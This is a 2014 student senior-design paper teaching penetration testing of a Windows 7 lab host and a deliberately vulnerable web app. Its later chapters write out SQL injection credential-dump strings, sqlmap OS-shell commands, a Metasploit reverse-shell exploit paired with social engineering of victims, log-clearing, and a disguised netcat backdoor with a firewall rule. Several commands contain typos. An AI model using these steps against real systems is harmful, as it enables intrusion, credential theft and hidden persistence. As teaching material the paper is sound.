1

Pentesting Windows

___________________________________________________________________________________________

Prepared by

Chad Bartusick __________________________________________

In

Partial Fulfillment of the requirements

For

Senior Design – CSC/CTC 492

Department of Computer Science

California State University, Dominguez Hills Fall 2014

Committee Members/Approval

_____________________ ______________________

_______________ Faculty advisor Signature Date

_____________________ ______________________

_______________ Committee member Signature Date

______________________ ______________________ _______________ Committee member Signature Date

Dr. Mohsen Beheshti ______________________ _______________ Department Chair Signature Date

2

Table of Contents

Approval sheet ............................................................................................1

Table of Contents .......................................................................................2

Abstract .......................................................................................................3

Introduction ................................................................................................4

Chapter 1 – Background ...........................................................................5

Section 1.1 – What is penetration testing? ...................................................6

Section 1.2 –Pre-Requisites .........................................................................7

Chapter 2 - Planning and Preparation.........................................................8

Section 2.1 – Directive approach ................................................................9

Section 2.2 - Prior Research and vulnerabilities ........................................10

Chapter 3 – Information Gathering and analysis ......................................11

Section 3.1 – Network Scanning .......................................................... 12-13

Section 3.2 – Webapp Scanning .......................................................... 14-15

Chapter 4- Vulnerability Detection ..........................................................16

Section 4.1 – Host Vulnerability Scanning .......................................... 17-18

Section 4.2 - Webapp Vulnerability Scanning ..................................... 19-20

Section 4.3 – Manual detection ............................................................ 21-23

Chapter 5 – Penetration Attempt ..............................................................24

Section 5.1 – Good ole Metasploit ....................................................... 25-26

Section 5.2 – Webapp penetration and Database dump ....................... 27-28

Chapter 6 – Covering Tracks and Persistence ..........................................29

Section 6.1 - Keep calm…Clear the logs ..................................................30

Section 6.2 – Botnets and Backdoors for Everyone! .................................31

Conclusion ................................................................................................32

Reference…………………………………………………………...……33

Appendix .............................................................. ……………..…….34-40

3

Abstract

In today’s society, people do not fear any intrusion on their computer because they place

their trust in the security of the internet and in the antivirus protection loaded on their personal

computer. Through this paper I will demonstrate how recklessly false this belief is and how

shockingly easy to break into windows 7 computers or servers through multiple points of entries.

The reason of this demonstration is to convey a message to those who are unaware of such

potential threats and for educational purposes. First, I demonstrate how quickly I am able to

break in, and after that I will traverse some different methodologies and the processes

professional penetration testers take on penetration networks or systems. The reason I’m

choosing Windows 7 is because in today’s cooperate world every company uses Windows 7 for

some form of productivity. Linux, another computer operating system, is a major player as well,

but as for entry into a network. I want to find the path of least resistance and Linux tends to be a

bit more robust and secure. In addition to penetrating Windows 7, I will showcase a new tool I’m

developing enumerating user data once a system has been “rooted. This piece of python code

will gather system credentials and establish a simple botnet for later use. My goal is that the

reader understands the serious concern for the lack of security in Windows 7 and how hackers

trying to expand their knowledge in penetration testing gain a broader understanding of entry

points. Hackers consumed by curiosity love to learn and possess ‘personality’ characteristics of

keen problem solving skills and the ability to absorb and retan large amounts of meaningless

details. This information will be their greatest weapon. This research paper will give you the

tools and knowledge to start conducting your own pentest.

4

Introduction

This paper will focus on the main aspects of pentesting windows 7. Within the pentesting

windows 7, I will demonstrate the use of a collection of tools used to help facilitate the attack. A

strong background of the OSI model and how TCP/IP works will help with the understanding of

this paper. Windows is vulnerable in so many ways that I thought I’d present you with a staple

setup example. The example contains a lab of Kali Linux as the attacking system and the victim

system will be Windows 7 with a W.A.M.P(Windows,Apache,MySQL, and PHP) stack. The

victim will host a web app within WAMP called Mutillidae which is a highly vulnerable webapp

with the top 10 O.W.A.S.P (Open Web Application Security Project) vulnerabilities. Mutillidae

will help simulate a web server hosting a variety services that the victim might be facilitating to

customers. Since we are covering most aspects, I will show introductory methods only of

pentesting. The sheer amount of knowledge of webapp exploitation alone would easily exceed

this paper 100 fold. Some example attacks we will conduct will be brut forcing credentials, man

in the middle attacks, sniffing credentials, SQL injection, cross site scripting, stealing sessions,

and exploiting a known service vulnerability.

5

1. Background

First, a little background about myself. I have 2 years of industry experience working as

a security analyst. Most of my projects were security engineering driven. During my two years I

wrote quite a bit of python code and have utilized all the web languages. I contributed to

pentesting of webapp environments and also network pentest.

The history of pentesting started in the 1960s when a timesharing system was comprised.

That system was named AN/FSQ-32. It was that point of time after the break in that researchers

and anylyst decided to begin conducting studies on breaking into systems. The actual term

penetration test was deemed during a conference by a group of individuals from the RAND

Corporation and NSA. This is when the term “Penetration Test” was born. This group warned of

future generations being attacked as the standard input and output was vulnerable to the

malicious logic of humans writing hacking software.

Kali Linux, the attacking distribution was born from a Debian Linux distribution. It was

more formally known as Backtrack in the early 2000s. Kali is a collection of hacking tools.

These tools are the swiss army knife of penetration testing. These tools are on Linux because the

sheer amount of flexibility on Linux overshadows windows. The tools will be disused more in

depth throughout the paper.

Windows 7 the successor to Windows vista, was released in 2009 is the most widely used

operating system on the planet. Over 1000 core developers worked on Windows 7 and it has

above 32 million lines of code, which in turn means more vulnerability. A contributing factor as

to why hackers target Windows is because almost every major corporation uses windows 7 for

productivity.

6

1.1 What is penetration testing?

For most of you reading, I will assume you have some knowledge of what penetration

testing is. If not, penetration testing is the art and science of breaking into a computer

system. The process consists of 5 major steps; each step gets you additional information

about the system. Once the test is conducted, you gather your findings and compile an

intricate report for the customer. The sole purpose of a penetration test is to find and collect

vulnerabilities. It is up the customer whether you go further and start to capitalize on their

systems. That is highly unlikely for most customers usually want a skim of the network for

vulnerabilities or a web app scan. Penetration testers do not fix the actually vulnerabilities,

instead they advise the customers and point them in a direction of remediation. Penetration

testing can be conducted on Windows and Linux as well as Mac. There are three different

types of penetration tests which are white box, gray box, and black box. White box

penetration testing is conducted with full knowledge of the company and its resources. You

might even get access to their source code on some services or applications. With gray

boxing, you learn moderate information about the company however the information you get

may be very powerful. Black boxing consist of no knowledge at all about the company you

are testing. It is the most realistic type of penetration testing as it simulates outside attackers.

I will be conducting a black box simulation but obviously I know all the ins and outs so

technically this is a white box penetration test. Before I begin, I would like to share a couple

quotes for penetration testing that I abide by the first, “Knowledge is power”, Francis Bacon.

This I find true and very important for penetration testing. “The quieter you are, the more you

can hear”, Ram Dass. Which means undetected surveillance is accumulative.

7

1.2 Pre-Requisites

What do you need to know for this paper and demonstration you might ask? Well, you

need to know a tad bit of Linux administration and some shell commands. You also need to

know some Windows administration as well.

Learning penetration testing is quite obscure forcing most, if not all hackers to learn from

other hackers. Pre-requisites are a bit misleading too since a hacker’s true motivation is to

absorb and learn something new. Hackers are consumed with curiosity and love to learn. If

you’re passionate about becoming a full time penetration tester, you need to posses this

characteristic. I will give you some insight on what penetration testers should know or

eventually learn, but for the sake of this paper you only need to know what I listed above.

Most professional penetration testers know a wide variety of skills. These skills include

Windows administration, Linux administration, LDAP, Active Directory, OSI model,TCP/IP,

Packet analysis, radius client/server, TACACS, python or Perl, php, MySQL, Oracle, CMS’s,

and some knowledge about Samba. This list can extend even further as you get more directed

to embedded systems such as routers and wireless hacking. For the most part, a good chuck

of what our skill requires is in that list. Penetration testers often too pick very specific paths;

some may even choose to do reverse engineering of malware or engineering of malware for

penetration purposes. The material above is accessible from books sold to the public and can

be purchased at Amazon or Barnes and Nobel. Knowledge does in fact hold a lot of power.

You realize this power by knowing MySQL queries; for example you can indeed dump out

table data or inject data into the table. Make learning a passion and give it drive through

pursuing security!

8

2. Preparation and planning

The very first step is to get your reporting and documentation organized and ready for

what we are about to find. You may use any tool of your choice but I personally use VIM

text editor for everything, including programming. I have witnessed others using Microsoft

Word. There is a neat tool for both Windows and Linux called Dradis. It is a very exotic tool

that collects data from NMAP and user input as well. This tool organizes everything for you

and can export all the data to most file types. This comes in handy when you are testing a

very large subnet or multiple subnets. When documenting your findings, you need to screen

shot as much as you can. Once you have some screen shots, you must write descriptions.

The screens shots must be POC (proof of concept). Screen shots must essentially tell a story

and show what data was extracted or exploited. For the most part, the customer does not

want solely text as text can be rather boring. List all your IP’s in accordance to the subnets

and list all the credentials in order of their services as well. When documenting individual

host with the vulnerability you need to organize the highest priority vulnerability at the top

and color coated each in descending order such as red then orange then green.

When conducting, you need to have your environment set up. This includes a laptop with

Kali Linux or your favorite distribution, a couple of flash cards, and a wireless dongle with

an attachable antenna. You should have all your tools installed if you wish you use Kali. For

those who are not using Kali, I will explain each tool I am using. If you are a freelance

penetration tester, it is essential to conduct business in a legal and professional manner. If

you are working internally, you should have written authority over the test. The legal

documents will contain a NDA (non-disclosure agreement) outing what is “off limits” for

you to touch in the company system.

9

2.1 Directive Approach

The directive approach is ideal if you can afford it. It consists of a team of penetration

testers. For this type of approach, the team has split operations for testing which can be

highly effective yielding results needed in a short amount of time. Usually, pairs of testers

are assigned to each process of the penetration testing process. For example, two testers will

scan and do reconnaissance and from there they will connect to Dradis which centralizes the

findings. Two other testers would start the vulnerability scans once the first team has found

some additional hosts. Another team of two would then begin exploitation from the findings

of the vulnerability scanning team. The last team of two would be post exploitation and

persistence. The structure is cascading and frees us of time constraints for each individual

group and tester. If there are any false positives within the group, there are more findings

from the prior team still flowing in to the Dradis database. Again Dradis is optional; you can

use any centralized tool you like. I participated on the defending side of this type of approach

during the WRCCDC (Western Region Collegiate Cyber Defense Competition) and you see

waves of scans at first then in a matter of minutes you start to see odd and unusual things

happen amongst your machine which gave our team little time to defend.

The directive approach is maintained by a captain who organizes the entire thing. The

captain will oversee each area and decide if there is a vector in which he wants to focus more

on. This approach Is also ideal for when certain members lack skill in a certain area but excel

in an another. This gives the team a focal point in their prowess. The team can also be remote

and login to attack via if the legal docs are permissible of that action. This gives the team

greater flexibility.

10

2.2 Prior Research and Vulnerabilities.

If you do not know what vulnerabilities are, I will explain. Vulnerabilities are bugs and

faults within the code that range from a variety of things. These vulnerabilities whether it is

input that isn’t contained by length or limits on sequel statements can be used to generate and

exploit. The exploit is written to do one thing, and that is exploiting the target system. There

is code engineered within the exploit to help facilitate the exploitation. The exploit can be

written in a multitude of languages. From there, we develop a payload which launches the

attack and if it contains malicious code to execute. Usually the payload is a reverse shell

which will discuss later.

Researching prior vulnerabilities is a great way to get ahead of the game when pentesting.

If you are going to attack a company or a single party and you know what services they are

renowned for as it would be to your advantage to find the vulnerabilities that exist for the

current services. The company may these vulnerabilities listed on the black market or if you

are late they will have a patch notes area and it will be listed there time stamp. One thing that

may be helpful is to find a pattern with existing services. If they tend to have a lot of custom

services, you may want to scan it the upper region of the port numbers beyond the well

known ports (1-1024).

Vulnerabilities exist for a short time also called ZERO day which is the day the exploits

are discovered. There is a limited amount of time to use that exploit on top system before

they are patched. An easy but very useful site to use is http://exploit-db.com. This site

contains a list of up-to-date exploits that are ready to use on zero and within weeks to pass on

existing systems. Zero day is a very happy for pentesters.

11

3. Information Gathering and Analysis

We begin our Journey with the first step, “Information Gathering” also called

reconnaissance. Since there are a total of five steps listed in some sources, I am going to

combine reconnaissance with scanning.

I will start off with a proper definition for reconnaissance. It is as follows; “The first and

most important step in an attack involves finding out as much information as possible about

the TOE (Target of Evaluation). If a passive information gathering approach is taken it will

not raise any alarms. Patience and creativity are also a necessity as this can be the longest

phase of the attack.” (DeFino 6).

The proper definition of scanning and reconnaissance from the book, “Official Certified

Ethical Hacker Review Guide” by Steven DeFino states that “The goal of scanning is to learn

as much technical data about the systems as possible. Live host are found and the network is

foot printed. The access points on each live host are determined. Finally, the services that are

available are confirmed and the operating systems of each platform are verified. Polices and

user information is gathered and, finally vulnerabilities are assessed.”(DeFino. et al 6).

One thing to mention of past experience is even though the first phase maybe the longest,

it certainly can be the fastest if you hit the target the right time and gather what you need for

easy access. However, most of the time it is the longest phase. There is two more

vulnerability databases I need to mention and those are http://cve.mitre.org and

http://osvdb.org. Both these are the most prominent vulnerability databases around.

12

3.1 Network Scanning

A small tool and easy discovery for passive reconnaissance is a tool called “Discover-

Scripts”. These tools will literally fetch and retrieve most of the passive reconnaissance

items. It will save you loads of time when you can be discovering other easy to obtain items.

“The Hacker Playbook” by Peter Kim states, “This tool automates a lot of different searches

in one tool. For example, it can search people within that organization or domains on all the

common harvesting sites (e.g. LinkedIn), use common domain tools (e.g. goofile, goog-mail,

theHarvester, search_email_collector, mydnstools) and link 3rd party tools to perform

additional searching.”(Kim 21)

After briefly going over reconnaissance, I want to move on to scanning. Nmap (Network

Mapper) is the most popular tool for actively scanning networks. “Nmap Netowrk Scanning”

by “Gordon Fyodor Lyon” states, “Nmap (“Network Mapper”) is a free and open source

utility for network exploration and security auditing.”(Lyon xxi). In an extension to this

description his says, “ Nmap uses raw IP packets in novel ways to determine what hosts are

available on the network, what services (application name and version) those host is offering,

what operating systems (and OS versions) are running, and what type of packet

filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly

scan large networks, but works fine against single host.”(Lyon xxi).

The use of Nmap is trivial, I will list some commands and a short scription. This is where

we actively start when pentesting a host or large network. Finding points of interest on single

host or large networks.

13

Try a ping sweep.

nmap –sP –v [target range]

Try a list scan.

Nmap –sL –v [target range]

Try a protocol scan.

Nmap –sO –v [target IP]

Try to verify services.

Nmap –sV –v [target IP]

Try a normal connect scan.

Nmap –sT –v [target IP]

Try a stealth scan.

Nmap –sS –v [target IP]

Try an inverse scan: Xmas.

Nmap –sX –v [target IP]

Try an inverse scan: NULL.

Nmap –sN –v [target IP] (DeFino et al 58)

These findings should be filed sorted and for the next and upcoming phases of attack. I am

assuming you already have knowledge in networking and standard TCP/IP.

14

3.2 Webapp Scanning

Webapp Scanning is essentially web page spidering. The Web Hackers Handbook 2

states, “Various tools can perform automated spidering of websites. These tools can work by

requesting a webpage, parsing it for links to other content, requesting these links and continuing

recursively until no new content is discovered.”(Stuttard et al 74). Spidering is essential to the

discovery of attack vectors. Burp Suite is a great tool to use when mapping a website. The

Hacker Play Book states, “To spider your application, drop into the target tab, site map tab,

right click on the domain you want to spider, and click “Spider this host”. Once the spidering

process is complete, Burp should have a good layout of exactly what the application looks

like.”(Kim 49). Burp Suite Site Map

Figure 19 – Taken from The Hackers Playbook

Some files and folders might not be listed in the spider listing. You may navigate to these

manually if you know them off hand or you can right click site map and click engage tools then

finally click “Discover Content”. If the site has authentication on it you Burp may be configured

to use HTTP - basic auth, HTTP – Disgest Authentication, and Form Based Authentication. The

Web Hackers Handbook gives us a great tip for finding hidden content. “Many web servers

contain a file named robots.txt in the web root that contains a list of URL’S that the site does not

15

want web spiders to visit or search engines to index. Sometimes, this file contains references to

sensitive functionality, which you are certainly interested in spidering. Some spidering tools

designed for attacking web applications check robots.txt file and use all URLs within it as seeds

in the spidering process. In this case, the robots.txt file may be counterproductive to the security

of the web application.”(Stuttard et al 74). This robots.txt is listed in the top domain path e.g.

(www.example.com/robots.txt).

Once you have a general map of the site you should see have a list of good attack vectors.

Some things you’ll be looking for are listed by the Web Hackers Handbook 2

Other , More peripheral application behavior, including off-site links, error

messages, administrative and login functions, and the use of redirects.

The core security mechanisms and how they function – in particular, management

of session state, access controls, and authentication mechanism and supporting

logic (user registration, password change, and account recovery)

All different locations at which the application processes user-supplied input –

every URL, query string parameter, item of POST data, and cookie

The technologies employed on server side, including static and dynamic pages,

the types of request parameters employed, the use of SSL, web server software,

interaction with databases, email systems, and other back-end components

(Stuttard et al 98)

In detail, these items would be quite a bit to cover. These items are the items to look for when

spidering. Take note of the locations and what default value or key pair is listed. Knowing the

server side software is very much important as well.

16

4 Vulnerability Detection

After you gathered you list of IP addresses and subnets containing possibly vulnerable

services etc. You may also have a site map of a possibly badly developed web app you spidered

from na apached server running on a windows 7 host. The next step is to probe and test these

vectors of attack. First The following diagram shows the ratio of Web vulnerabilities.

WEBAPP VULERABILITY RATIO

Figure 5 – from Whitehatsec.com

During the years of early 2000, this was the ratio of software vulnerabilities. Although the

statistics haven’t greatly changed since then, we will not be getting into the actual finding of

vulnerabilities of software and instead the enumeration of existing ones.

SOFTWEAR VULERABILITY RATIO

Figure 1 – from research.microsoft.com

17

4.1 Host Vulnerability Scanning

From the list of IP addresses you might find that some of the you can now start your

vulnerability scanner and scanning single targets or a range of targets from a subnet. When it

comes down to which vulnerability scanner to use, you have three choices. The first choice Open

VAS, is my personal favorite. Open Vas is a free community driven scanner that is updated

from the community and by the community. The setup is rather long and very complex and I

must mention the setup can sometimes break. The next option is Nessus vulnerability scanner.

Nessus is also free but no up-to-date plugins. Plugins in a vulnerability scanner are the mini-

programs that facilitate the detection of the vulnerability. Not having an up-to-date plugin

database will be your downfall. By the way, Nessus charges $1,500 dollars for a single license.

Nexpose is the last option, and they are similar to Nessus in that they limit the features and

plugins as well. They also begin charging around $2,000 dollars for the license. You can see why

I prefer OpenVAS to any other scanner. OpenVAS is usually already installed on Kali linux as

well. They have made the setup seemingly easy from what I’ve heard. For the sake of simplicity

I will explain Nessus and Nexpose since they are both used in commercial environments. The

hacker play book explains, “If time is a large concern, I’ll actually run a profile first to look for

only known exploitable vulnerabilities and a second scan with the default profile. This way, the

first scan will complete in a fraction of the time and contain only critical findings.”(Kim 35). The

GUI’s do not need any explaining as they are all labeled and are pretty straight forward. You

input the IP address or subnet and select additional options for the attack and then launch it.

Some of the scanners do not have a progress bar so be patient. Interrupting the process can

sometimes break the software. Below you will find the first image is Nexpose and the second

image is Nessus.

18

NEXPOSE

Figure 8 – from The Hackers Handbook

NESSUS

Figure 9 – from The Hackers Handbook

These vulnerabilities will be listed with multiple ID numbers to them. For example, some might

have CVE, OSVD, BID, VUPEN. These are ID’s to vulnerability databases.

19

4.2 Webapp Vulnerability Detection

After you have spidered the webapp you cannot use the Burp suite to also probe for

vulnerabilities. My other favorite tools for probing for webapp vulnerabilities are OWASPZap

and W3af. We will talk about Burp suite active scanner. The Hacker play book states, “Once you

feel comfortable that you have identified an adequate portion of the site, you can start attacking

the parameters, request, and looking for vulnerably.”(Kim 52). Kim explains, “This can be done

by right clicking on the parent domain and dropping down to “Actively scan this host” (Image

below).”(Kim 53) BURP SITE MAP

Figure 23 – from The Hacker Play Book

Once the scanner has finished running you will have a listing of potential vulnerabilities on your

webapp. The reason we also spidered it was to give the scanner a FQDN to speed up the process

or else it will scan the entire site which might take quite a bit of time. The results will be on the

left hand side and be in and vertical list. Upon clicking one of the pages, you will see a list of

vulnerabilities associated with that page. You then can click then and evaluate if it is a false

positive or not. For example, the Burp Suit found a XSS vulnerability in the image below.

20

BURP SCANNER

Figure 24 - from The Hacker Play Book

To verify this is not a false positive we click the XSS vuln and copy and paste the URL

with the exact parameters. Once we navigate to that page we find out that XSS exist and there is

a Javascript alert window with the number 1 or any other attribute we specify within the alert

window from the attack. This is just an example as to the many vulnerability detections on

webapps. What is really neat with OWASPZap is the fact that it will do all these things at once if

you just put in the IP address of the site listed with the port number. Although it tends to get

rather slow because of the massive amounts data going back and forth. One of my first bug

hunting books I read as a child was, “Hunting Security Bugs” by Tom Gallagher et al. In the

book they explain the following about finding webapp bugs, “Use a fuzzer. Fuzzing is sometimes

dismissed because its goal is to send random junk to the component being tested. People often

think that this won’t yield great results and that targeted testing will cover these cases.

Surprisingly, fuzzing can find bugs that aren’t discovered through code review and targeted

testing.”(Gallagher 72). Fuzzing is a method of a tool that inputs random characters and number

into the input field hoping the webapp or application will fault and crash. That would signify a

bug and vulnerability.

21

4.3 Manual Detection

Once we have some host found and some services mapped to those host, we are lucky we

will find some web servers namely apache, IIS, or tomcat. These web servers may be mapped if

they are hosting dynamic web content. This dynamic web content could potentially be hosting

vulnerable elements or SQL statements and so on. OWASPZap, Burpsuite and w3af are some of

the best all in one tool for webapp scanning and exploitation. SQL injection can happen on

webapp input such as forms or in POST and GET request. I’m going to focus on the manual

findings on the webapp side. The first major OWASP vulnerability usually in webapps is SQL

injection. “Professional Penetration Testing” by Thomas Wilhelm says, “According to NIST

Special Publication 800-95, SQL injection is a “technique used for manipulating Web services

that send SQL queries to a RDBMS [relational database management system] to alter, insert, or

delete data in a database”(326 Wilhelm). To get everyone acquainted with some vulnerabilities

in SQL queries Wilhelm gives us the example,

SELECT * FROM user_data WHERE last_name = ‘Tom’

(Wilhelm 326)

The next example is what we can additionally add on to the query to make it pass back

everything in the database.

SELECT * FROM user_data WHERE last_name = ‘Tom’ OR ‘1’ =‘1’

(Whilhelm 326)

Since we added the logical OR operator the whether the username was correct or not it would

still return everything. The one thing missing from the end of his quote is “-- -“ which tells the

mysql line to turn to comments after the dashes. So essentially you tell it no to process anything

after that. To put this into a scenario I will explain bypassing a login. The scenario goes as

22

follows; you find out that by placing a “ ‘ “ into the input field of a login form that it displays and

error because the developers didn’t escape known SQL characters. The error displays the current

table and column’s. The Web Application Hackers Handbook 2, by Dafydd Stuttard et al gives

us this example

SELECT * FROM users WHERE username = ‘marcus’ and password = ‘secret’

(Stuttard et al 289)

Stuttard states “For example, if an attacker knows that the username of the application

administrator is admin, he can log in as that user by supplying any password and the following

username “admin’—“.”(Stuttard et al 289).

SELECT * FROM users WHERE username = ‘admin--‘ AND password = ‘foo’

(Stuttard et al 289)

This essentially turns the query into

SELECT * FROM users WHERE username = ‘admin’

(Stuttard et al 289)

The last example is manual extraction of data. From this we have the basics of bypassing and

extracting data. For example if we add a single apostrophe in to a form field we get an error.

Chances are the error might list the table name. From there we can construct our UNION

statement to extract the records from the current table or other tables with the same data type, but

take note this only works for matched number of fields. In order to find out what each fields

respective data type is and how many we can methodically guess by incrementing NULL values

on the UNION statement until we pass with no error message. NULL value is “any” data type.

' UNION SELECT null,null null,null,null -- -

23

Since my demonstration has 5 fields we will us that as an example. After we find out that the

table has five respective fields we can start guessing the data type or extracting current table

data.

'UNION SELECT null,Username,Password,null,null from accounts -- -

This will dump out the usernames and passwords from the accounts table. Keep in mind the

statement before the single apostrophe of us abruptly ending it was.

SELECT * FROM accounts where username=’

These are examples are a great way to start a pentest against a windows box. The next step

would be to look into command injection. It’s similar to SQLinjection but a little jagged.

24

5 Penetration Attempt

After we have executed some reconnaissance and found vulnerability, we can start either

brute forcing the victims PC or we can use what we have and start launching attacks via

Metasploit and some other automated tools like SQLmap. When it comes down to this stage you

have to remember there are people on pretesting teams dedicated to just the penetration part.

These individuals are highly trained and usually have a background in system administration or

engineering. The reason for this is that when you finally enter a victims PC you must know how

to navigate and setup additional environmental variables like backdoors. In addition, you also

need the knowledge of disabling startup processes and possibly antivirus as well. If the computer

is part of a domain then it will pay off to be able to exploit that as well if it is poorly set up. For

the next couple of sections I will be on Kali Linux initiating the attack. So brush up on your

Linux!

25

5.1 Penetration Attempt

Metasploit is available on Windows and Linux. I prefer the Linux platform for its

flexibility. The main purpose of Metasploit is to launch attacks on vulnerable services, although

there are a plethora of tools contained within this suite. To give you an example of the

functionality NMAP natively tied into this suit as well as some webserver hosting tools.

Metasploit is the Swiss army knife when it comes to penetration testing. I will begin this section

by exploiting ms10_046. Again, the format of the exploit title is given out by Microsoft. The first

part is the year and the last part is the number incremented of each they have discovered.

Ms10_046 is a vulnerability in the handling of Windows shortcut files (.LINK) that can contain

an icon resource pointing to a malicious DLL. The Metasploit Module for this creates a

WebDAV service that can be used to run an arbitrary payload when accessed as an UNC path.

First we start Metasploit framework by typing the following command.

Msfconsole

This will start the suit and load up a modified shell. From there we type

use exploit/windows/browser/ms10_046_shortcut_icon_ddlloader

This loads the module for that particular exploit. From there you are now able to set options for

the payload and even the exploit. Some options may be required. To see the options type

show options

Now we will set the current payload

set payload windows/meterpreter/reverse_tcp

26

Meterpreter is where all the magic happened after the payload launches Meterpreter and gives us

a nice shell back to the Windows 7 box. Meterpreter uses DLL injection and communicates over

Ruby stager socket. It gives us command remote command line ability. We are going to set the

options to use the local host a hosting server for our malicious site.

set SRVHOST 192.168.1.15

set LHOST 192.168.1.15

Review your options after you are done. That’s it! Now we can exploit simple type exploit.

Now we social engineer our victim into either going to the following page

\\192.168.1.15\mhjs\.

Or we can get them to render the icon of this URL

http://192.168.1.15/<anything>.lnk

This will cause a cause a Meterpreter session to be opened giving you a shell to the box.

Meterpreter session 1 opened (192.168.1.15:4444 -> 192.168.1.13:53636)

To get to your session you type

Session –I -1

That is all for Metasploit basics. This example is especially significant to me because social

engineer pentesting combined with the direct attack methodologies of something like Metasploit

make this very potent. Most people fall victim to social engineering attacks. I will continue

where we left off on this in the section 6.1 and 6.2. The next section I am going to discuss how to

use SQLmap which is a tool that has a place in my heart for dumping databases like a champ.

27

5.2 Webapp penetration and database dumping

SQLmap is a fantastic tool for finding SQL injections, manipulating database queries,

and dumping databases. It is in combination next to what I use with Metasploit. I will first

explain what a GET and POST parameters are to refresh your memory. In simpler terms a GET

Method is requesting data from a specific resource and a POST method is submitting data to be

processed to a specific recourse. Both methods travel within HTTP, although GET key pair

values are within the URL and POST is in the data portion of the request itself. There are many

other pros and cons to them but I will exploit both for a better example. Let’s start with

exploitation of the GET parameter.

Finding if the SQL inject is valid (the result will be the banner if valid).

sqlmap –u http://site.com/info.php?user=test&pass=test –b

(Kim 70)

Retrieving the database username:

sqlmap –u http://site.com/info.php?user=test&pass=test –current-user

(Kim 70)

Interactive shell

sqlmap –u http://site.com/info.php?user=test&pass=test –os-shell

(Kim 70)

If you are stuck with commands and you need help, you can always type sqlmap –wizzard.

28

The –u signifies a valid URL if you didn’t catch on. Kim states “If you need to test an

authenticated SQLmap injection finding, log into the website via a browser and grab the cookie.

Then you can define it using the data=[COOKIE] switch.”(Kim 70).

Next, I will move onto using the POST method.

Finding if an SQL inject is valid (the result will be in the banner if valid):

sqlmap –u http://site.com/info.php --data=”user=test&pass=test” –b

(Kim 71)

Retrieving the database username:

sqlmap –u http://site.com/info.php --data=”user=test&pass=test” –-current-user

(Kim 71)

Interactive shell:

sqlmap –u http://site.com/info.php --data=”user=test&pass=test” –-os-shell

(Kim 71)

SQL map has a collection of SQL injections build in. You may specify whether you want it to be

a blind injection where the test may come out a little more harder but those are more frequent to

catch or even a timed method were we send a wait command to the DB and time when the

database responds back. If the response is slowed then we have successfully used injection. We

are able to retrieve a lot out of this injection form what was stated. The shell is considered gold if

you can get it. The other option besides SQLmap is SQLninja. You would use this because it

may help evade IPS signatures that would possibly detect SQLmaps based injections.

29

6 Covering Tracks and Persistence

The reason to cover your tracks when you are in a system should be common sense.

When you enter a system you do not want to leave behind a digital footprint. Wilhelm gives us a

reason to stay stealthy, “System administrators use similar techniques to identify malicious

activity, when compared to network defenses. A system administrator can examine log files,

install applications the watch for malicious software, and set up monitors on a system to see if

anything inappropriate is running (such as a backdoor or brut force application) and harden their

systems in such a way that any changes within essential systems files are prevented and alerted

upon.”(Wilhelm 391).

Thomas also states, “Professional penetration testing requires stealth to avoid detection

during attacks that traverse the target network, but rarely involves cover tracks while in a target

system. In cases where part of the project is to determine the ability of the system administrators

to detect attack, some of the techniques in this chapter can be use full.”(Wilhelm 405)

There are some very basic methods when covering your tracks like using reverse tunnels

connected through proxies or using a VPN. The most common and more frequently used

methods are wiping logs and hiding files. This should be routine for penetration testers. Although

if this little step is missed, you will have all your activity logged whether it is in Linus or in

Windows. System administrators use log files very frequently to debug and to detect as Wilhelm

mentioned. Their main duty at work is to view the logs daily and some go to the extent of doing

that every 30 minutes. So being up to date on logging activity is essential.

30

6.1 Keep calm…Clear the logs

If we have a session opened up by Meterpreter, clearing the logs is as simple as typing:

getssystem

clearrev

Below is an example output.

CLEARING LOGS

Figure 3 – from null-byte.wonderhowto.com

Hiding files is very basic but won’t necessarily help you elude virus detection and so

forth. It is still used every time as good practice to ellude the naked eye from victims.

Hiding files simply put is done with this command:

attrib +h virus.exe

Virus.exe is an example, for you may put any file you like in there.

31

6.2 Backdoors for Everyone!

Persistence is another thing we are concerned about when wanting to maintain current

access in the box. Wilhelm states, “Our original compromise of the system may become blocked

through system patching or network changes preventing us from exploiting the system whenever

we need access.”(Wilhelm 387). I will explain how to be persistent and setup a netcat back door.

First we need to get a Meterpreter session like before, once we have that we can then upload the

backdoor with is netcat a program that writes and reads from sockets.

upload /usr/share/windows-binaries/tools/nc.exe C:\\windows\\system32

Next we need to make netcat start up on 443 when Windows starts

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Then we add netcat into the startup process.

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d

'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Next we configure the computer to allow remote connections outside the victim’s box through

443.

netsh advfirewall firewall add rule name="svchost service" dir=in action=allow

protocol=TCP localport=443

That is it now on the attacking machine and you should be able to connect to the victim by

connecting from netcat with this command.

nc -v victim_ip_address port

32

Conclusion

Penetration testing is breaking into a network to document vulnerabilities; sometimes

called a “threat and vulnerability assessment”. Even though systems are complicated or poorly

understood, it has come a long ways in the recent years. Some of the best penetration testers that

I know in the industry are self-taught and have a drive and passion to learn everything in sight.

With technology continuously changing, much of their success comes not from knowledge kept,

but from knowledge shared and the collaboration of knowledge is essential to every pentester.

Since the width of knowledge in this field is massive for some, it may be best to pick a

specialization and grow in that area. However, you do not need to stay specialized but it does

help to learn out of bound fields. The main thing to remember when in the penetration business is

to keep up with current methodologies and be willing to expand your intellect on some of the

more challenging aspects. I must warn that there is a spectrum of negativity with pentesting due

to the ease of exploitation. Most recognizable forms can be found in social engineering since it

has a sub field of penetration testing. With humans, first you undermine the person and then

exploit him/her when you have gained the leverage. Another example is a customer trying to use

fake money at a store to see if the cashier accepts it. The underling goal in both situations is to

take advantage of someone. A penetration tester can so the same with a computer without having

any human interaction. This is why some people believe penetration testing is more of a “hidden

education” because the direct knowledge learned from it can be used for malicious intent. With

that being said, it is wise to manage your talent, intellect, knowledge, and competitive urge and

use it for a good purpose. Pentetration testing is only orthodox when there is a legal binding

contract. Life is about continuous learning, growing and the discovery of new things. Apply this

passion with computer technology and the sky’s the limit for success.

33

References

Gallagher, Tom, Bryan Jeffries, and Lawrence Landauer. Hunting Security Bugs. Redmond,

WA: Microsoft, 2006. Print.

Kim, Peter. The Hacker Playbook: Practical Guide to Penetration Testing. North Charleston,

SC: Secure Planet, LLC, 2014. Print.

Wilhelm, Thomas. Professional Penetration Testing: Creating and Operating a Formal Hacking

Lab. Burlington, MA: Syngress Pub., 2010. Print.

Stuttard, Dafydd, and Marcus Pinto. The Web Application Hacker's Handbook: Finding and

